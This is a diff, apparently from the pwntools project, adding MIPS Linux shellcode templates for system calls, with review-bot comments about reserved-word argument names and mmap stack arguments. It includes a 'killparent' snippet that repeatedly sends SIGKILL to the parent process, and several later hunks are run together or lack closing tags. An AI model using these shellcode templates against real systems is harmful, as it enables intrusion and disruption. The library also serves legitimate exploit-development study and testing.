+Invokes the syscall geteuid. See 'man 2 geteuid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_geteuid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getgid.asm b/pwnlib/shellcraft/templates/mips/linux/getgid.asm
new file mode 100644
index 000000000..923a0f09b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getgid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getgid. See 'man 2 getgid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getgid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getgroups.asm b/pwnlib/shellcraft/templates/mips/linux/getgroups.asm
new file mode 100644
index 000000000..d91d2f4f7
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getgroups.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="size, list"/>
+<%docstring>
+Invokes the syscall getgroups. See 'man 2 getgroups' for more information.
+
+Arguments:
+ size(int): size
+ list(gid_t): list
+
+
+ ${syscall('SYS_getgroups', size, list)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getitimer.asm b/pwnlib/shellcraft/templates/mips/linux/getitimer.asm
new file mode 100644
index 000000000..afe23613c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getitimer.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="which, value"/>
+<%docstring>
+Invokes the syscall getitimer. See 'man 2 getitimer' for more information.
+
+Arguments:
+ which(itimer_which_t): which
+ value(itimerval): value
+
+
+ ${syscall('SYS_getitimer', which, value)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpeername.asm b/pwnlib/shellcraft/templates/mips/linux/getpeername.asm
new file mode 100644
index 000000000..34399cd42
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpeername.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, addr, len"/>
+<%docstring>
+Invokes the syscall getpeername. See 'man 2 getpeername' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(SOCKADDR_ARG): addr
+ len(socklen_t): len
+
+
+ ${syscall('SYS_getpeername', fd, addr, len)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpgid.asm b/pwnlib/shellcraft/templates/mips/linux/getpgid.asm
new file mode 100644
index 000000000..8a32000e2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpgid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="pid"/>
+<%docstring>
+Invokes the syscall getpgid. See 'man 2 getpgid' for more information.
+
+Arguments:
+ pid(pid_t): pid
+
+
+ ${syscall('SYS_getpgid', pid)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm b/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm
new file mode 100644
index 000000000..7318c949f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpgrp.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getpgrp')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpid.asm b/pwnlib/shellcraft/templates/mips/linux/getpid.asm
new file mode 100644
index 000000000..47028e745
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getpid. See 'man 2 getpid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getpid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm b/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm
new file mode 100644
index 000000000..f28a7b014
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpmsg.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/>
+<%docstring>
+Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information.
+
+Arguments:
+ fildes(int): fildes
+ ctlptr(strbuf): ctlptr
+ dataptr(strbuf): dataptr
+ bandp(int): bandp
+ flagsp(int): flagsp
+
+
+ ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getppid.asm b/pwnlib/shellcraft/templates/mips/linux/getppid.asm
new file mode 100644
index 000000000..88eb20f28
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getppid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getppid. See 'man 2 getppid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getppid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getpriority.asm b/pwnlib/shellcraft/templates/mips/linux/getpriority.asm
new file mode 100644
index 000000000..83f8994b2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getpriority.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="which, who"/>
+<%docstring>
+Invokes the syscall getpriority. See 'man 2 getpriority' for more information.
+
+Arguments:
+ which(priority_which_t): which
+ who(id_t): who
+
+
+ ${syscall('SYS_getpriority', which, who)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getresgid.asm b/pwnlib/shellcraft/templates/mips/linux/getresgid.asm
new file mode 100644
index 000000000..ac3085905
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getresgid.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="rgid, egid, sgid"/>
+<%docstring>
+Invokes the syscall getresgid. See 'man 2 getresgid' for more information.
+
+Arguments:
+ rgid(gid_t): rgid
+ egid(gid_t): egid
+ sgid(gid_t): sgid
+
+
+ ${syscall('SYS_getresgid', rgid, egid, sgid)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getresuid.asm b/pwnlib/shellcraft/templates/mips/linux/getresuid.asm
new file mode 100644
index 000000000..63735adda
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getresuid.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="ruid, euid, suid"/>
+<%docstring>
+Invokes the syscall getresuid. See 'man 2 getresuid' for more information.
+
+Arguments:
+ ruid(uid_t): ruid
+ euid(uid_t): euid
+ suid(uid_t): suid
+
+
+ ${syscall('SYS_getresuid', ruid, euid, suid)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm b/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm
new file mode 100644
index 000000000..275839540
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getrlimit.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="resource, rlimits"/>
+<%docstring>
+Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information.
+
+Arguments:
+ resource(rlimit_resource_t): resource
+ rlimits(rlimit): rlimits
+
+
+ ${syscall('SYS_getrlimit', resource, rlimits)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getrusage.asm b/pwnlib/shellcraft/templates/mips/linux/getrusage.asm
new file mode 100644
index 000000000..cf4c77667
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getrusage.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="who, usage"/>
+<%docstring>
+Invokes the syscall getrusage. See 'man 2 getrusage' for more information.
+
+Arguments:
+ who(rusage_who_t): who
+ usage(rusage): usage
+
+
+ ${syscall('SYS_getrusage', who, usage)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getsid.asm b/pwnlib/shellcraft/templates/mips/linux/getsid.asm
new file mode 100644
index 000000000..7726dde5c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getsid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="pid"/>
+<%docstring>
+Invokes the syscall getsid. See 'man 2 getsid' for more information.
+
+Arguments:
+ pid(pid_t): pid
+
+
+ ${syscall('SYS_getsid', pid)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getsockname.asm b/pwnlib/shellcraft/templates/mips/linux/getsockname.asm
new file mode 100644
index 000000000..e6bec23b0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getsockname.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, addr, len"/>
+<%docstring>
+Invokes the syscall getsockname. See 'man 2 getsockname' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(SOCKADDR_ARG): addr
+ len(socklen_t): len
+
+
+ ${syscall('SYS_getsockname', fd, addr, len)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm b/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm
new file mode 100644
index 000000000..74d1fc472
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getsockopt.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, level, optname, optval, optlen"/>
+<%docstring>
+Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information.
+
+Arguments:
+ fd(int): fd
+ level(int): level
+ optname(int): optname
+ optval(void): optval
+ optlen(socklen_t): optlen
+
+
+ ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm
new file mode 100644
index 000000000..694769cfb
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/gettimeofday.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="tv, tz"/>
+<%docstring>
+Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information.
+
+Arguments:
+ tv(timeval): tv
+ tz(timezone_ptr_t): tz
+
+
+ ${syscall('SYS_gettimeofday', tv, tz)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/getuid.asm b/pwnlib/shellcraft/templates/mips/linux/getuid.asm
new file mode 100644
index 000000000..a06db1a4c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/getuid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getuid. See 'man 2 getuid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getuid')}
diff --git a/pwnlib/shellcraft/templates/mips/linux/gtty.asm b/pwnlib/shellcraft/templates/mips/linux/gtty.asm
new file mode 100644
index 000000000..58882b333
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/gtty.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, params"/>
+<%docstring>
+Invokes the syscall gtty. See 'man 2 gtty' for more information.
+
+Arguments:
+ fd(int): fd
+ params(sgttyb): params
+
+
+ ${syscall('SYS_gtty', fd, params)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/ioctl.asm b/pwnlib/shellcraft/templates/mips/linux/ioctl.asm
new file mode 100644
index 000000000..4dfe3aa4c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/ioctl.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="fd, request, vararg"/>
+<%docstring>
+Invokes the syscall ioctl. See 'man 2 ioctl' for more information.
+
+Arguments:
+ fd(int): fd
+ request(unsigned): request
+ vararg(int): vararg
+
+
+ ${syscall('SYS_ioctl', fd, request, vararg)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/ioperm.asm b/pwnlib/shellcraft/templates/mips/linux/ioperm.asm
new file mode 100644
index 000000000..84e200102
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/ioperm.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="from, num, turn_on"/>
+<%docstring>
+Invokes the syscall ioperm. See 'man 2 ioperm' for more information.
+
+Arguments:
+ from(unsigned): from
+ num(unsigned): num
+ turn_on(int): turn_on
+
+
+ ${syscall('SYS_ioperm', from, num, turn_on)}
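Review bot: `<%page args="from, num, turn_on"/>` in ioperm.asm uses `from`, a Python reserved word, as a template argument; Mako materialises page args as Python locals in the generated render function, so rendering this template should fail with a SyntaxError unless the template loader renames keyword arguments before compilation. link.asm (`from, to`) and linkat.asm (`fromfd, from, tofd, to, flags`) in the following hunk group have the same problem. The generator should map reserved words to a safe spelling, e.g. `<%page args="from_, num, turn_on"/>` and `${syscall('SYS_ioperm', from_, num, turn_on)}`, with the Arguments line in the docstring updated to match. Arguments named `len`, `list` and `type` (fallocate, getpeername, getsockname, getgroups, faccessat) only shadow builtins inside their own template and render fine, but the same renaming pass could cover them for readability.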
diff --git a/pwnlib/shellcraft/templates/mips/linux/iopl.asm b/pwnlib/shellcraft/templates/mips/linux/iopl.asm
new file mode 100644
index 000000000..7e41015cd
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/iopl.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="level"/>
+<%docstring>
+Invokes the syscall iopl. See 'man 2 iopl' for more information.
+
+Arguments:
+ level(int): level
+
+
+ ${syscall('SYS_iopl', level)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/kill.asm b/pwnlib/shellcraft/templates/mips/linux/kill.asm
new file mode 100644
index 000000000..4b99e4039
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/kill.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.mips.linux import syscall
+%>
+<%page args="pid, sig"/>
+<%docstring>
+Invokes the syscall kill. See 'man 2 kill' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ sig(int): sig
+
+
+ ${syscall('SYS_kill', pid, sig)}
diff --git a/pwnlib/shellcraft/templates/mips/linux/killparent.asm b/pwnlib/shellcraft/templates/mips/linux/killparent.asm
new file mode 100644
index 000000000..9c59aff0f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/killparent.asm
@@ -0,0 +1,16 @@
+<%
+ from pwnlib.shellcraft.mips.linux import getppid, kill
+ from pwnlib.constants import SIGKILL
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Kills its parent process until whatever the parent is (probably init)
+cannot be killed any longer.
+
+<%
+ killparent_loop = label('killparent')
+%>
+${killparent_loop}:
+ ${getppid()}
+ ${kill('$v0', SIGKILL)}
+ beq $v0, $zero, ${killparent_loop}
diff --git a/pwnlib/shellcraft/templates/mips/linux/lchown.asm b/pwnlib/shellcraft/templates/mips/linux/lchown.asm
new file mode 100644
index 000000000..d9ec7d6ca
--- /dev/null
+++ b/pwnlib/shellcraft/templates/mips/linux/lchown.asm
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/mips/linux/link.asm b/pwnlib/shellcraft/templates/mips/linux/link.asm new file mode 100644 index 000000000..11e19ca6c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/linkat.asm b/pwnlib/shellcraft/templates/mips/linux/linkat.asm new file mode 100644 index 000000000..c4ba610de --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/listen.asm b/pwnlib/shellcraft/templates/mips/linux/listen.asm new file mode 100644 index 000000000..f6428fdad --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} 
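Review bot: `<%page args="from, to"/>` in link.asm uses the reserved word `from` as a parameter name, so Mako's generated render function is a SyntaxError and `shellcraft.mips.linux.link` cannot be rendered; `${syscall('SYS_link', from, to)}` fails for the same reason, and linkat.asm on this same diff line repeats the problem with `fromfd, from, tofd, to, flags`. Rename it consistently in both templates: `<%page args="from_, to"/>`, `from_(char): from_` and `${syscall('SYS_link', from_, to)}`.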
diff --git a/pwnlib/shellcraft/templates/mips/linux/lseek.asm b/pwnlib/shellcraft/templates/mips/linux/lseek.asm new file mode 100644 index 000000000..baef8660f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/mips/linux/lstat.asm b/pwnlib/shellcraft/templates/mips/linux/lstat.asm new file mode 100644 index 000000000..85927cf97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/lstat64.asm b/pwnlib/shellcraft/templates/mips/linux/lstat64.asm new file mode 100644 index 000000000..0e7edb6a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/madvise.asm b/pwnlib/shellcraft/templates/mips/linux/madvise.asm new file mode 100644 index 000000000..fad41fbf3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/madvise.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mincore.asm b/pwnlib/shellcraft/templates/mips/linux/mincore.asm new file mode 100644 index 000000000..acca576cd --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mkdir.asm b/pwnlib/shellcraft/templates/mips/linux/mkdir.asm new file mode 100644 index 000000000..fd2f17617 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm b/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm new file mode 100644 index 000000000..d6379a57e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/mknod.asm b/pwnlib/shellcraft/templates/mips/linux/mknod.asm new file mode 100644 index 000000000..09ee3cb28 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mknodat.asm b/pwnlib/shellcraft/templates/mips/linux/mknodat.asm new file mode 100644 index 000000000..05d8b9c73 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mlock.asm b/pwnlib/shellcraft/templates/mips/linux/mlock.asm new file mode 100644 index 000000000..f8d932814 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mlockall.asm b/pwnlib/shellcraft/templates/mips/linux/mlockall.asm new file mode 100644 index 000000000..7d93befd1 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mlockall.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mmap.asm b/pwnlib/shellcraft/templates/mips/linux/mmap.asm new file mode 100644 index 000000000..43fb3a007 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mprotect.asm b/pwnlib/shellcraft/templates/mips/linux/mprotect.asm new file mode 100644 index 000000000..d05914836 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm b/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm new file mode 100644 index 000000000..646bf1afc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_notify.asm 
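Review bot: mmap.asm hands six arguments to `syscall`, but the MIPS o32 kernel ABI carries only the first four in $a0-$a3 and expects the fifth and sixth (`fd`, `offset`) at 16($sp) and 20($sp); whether the `syscall` helper imported from `pwnlib.shellcraft.mips.linux` spills them onto the stack is not visible in this hunk and should be confirmed before this template is relied on. If it does not, `fd` and `offset` are silently dropped and the mapping fails or maps the wrong file. Once verified, a one-line docstring note such as `Arguments 5 and 6 are passed on the stack per the o32 ABI; see the syscall helper.` would record the dependency.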
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_open.asm b/pwnlib/shellcraft/templates/mips/linux/mq_open.asm new file mode 100644 index 000000000..328b795b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm new file mode 100644 index 000000000..33932b012 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm new file mode 100644 index 000000000..d65bd51f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_timedsend.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm new file mode 100644 index 000000000..eefba26bf --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/mremap.asm b/pwnlib/shellcraft/templates/mips/linux/mremap.asm new file mode 100644 index 000000000..169a1e3e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/msync.asm 